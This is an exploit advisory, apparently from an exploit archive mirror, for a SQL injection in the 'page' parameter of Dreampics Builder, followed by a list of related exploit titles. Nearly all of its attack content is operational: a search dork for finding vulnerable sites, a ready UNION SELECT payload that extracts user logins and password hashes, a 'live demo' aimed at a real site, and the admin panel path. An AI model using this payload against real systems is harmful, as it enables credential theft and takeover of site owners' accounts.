#########################################################

#

# PICS BUILDER (page) SQL Injection Vulnerability

#========================================================

# Author: Hussin X =

# =

# Home : www.tryag.cc/cc =

# =

# email: darkangel_g85[at]Yahoo[DoT]com =

# =

#=========================================================

#

# script : http://www.dreamlevels.com/dreampics.php

#

# DorK : powered by Dreampics Builder

#

##########################################################

Exploit:

www.[target].com/Script/?page=-2 union select null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null from users--

L!VE DEMO:

http://www.dreamlevels.com/demo/photosite/?page=-2 union select null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null from users--

Admin Login :

/admin/

########################( Greetz )###########################

# #

# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #

# #

# Iraqihack / FAHD / mos_chori / Silic0n #

# #

#############################################################

Im IRAQi

【Dreampics Builder (page) Remote SQL Injection Vulnerability】相关文章：

★ Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

★ pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

★ webEdition CMS (we_objectID) Blind SQL Injection Exploit

★ Rianxosencabos CMS 0.9 Remote Add Admin Exploit

★ TGS CMS 0.3.2r2 Remote Code Execution Exploit

★ Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

★ MS Windows (.doc File) Malformed Pointers Denial of Service Exploit

★ minb 0.1.0 Remote Code Execution Exploit

★ BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability

★ Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability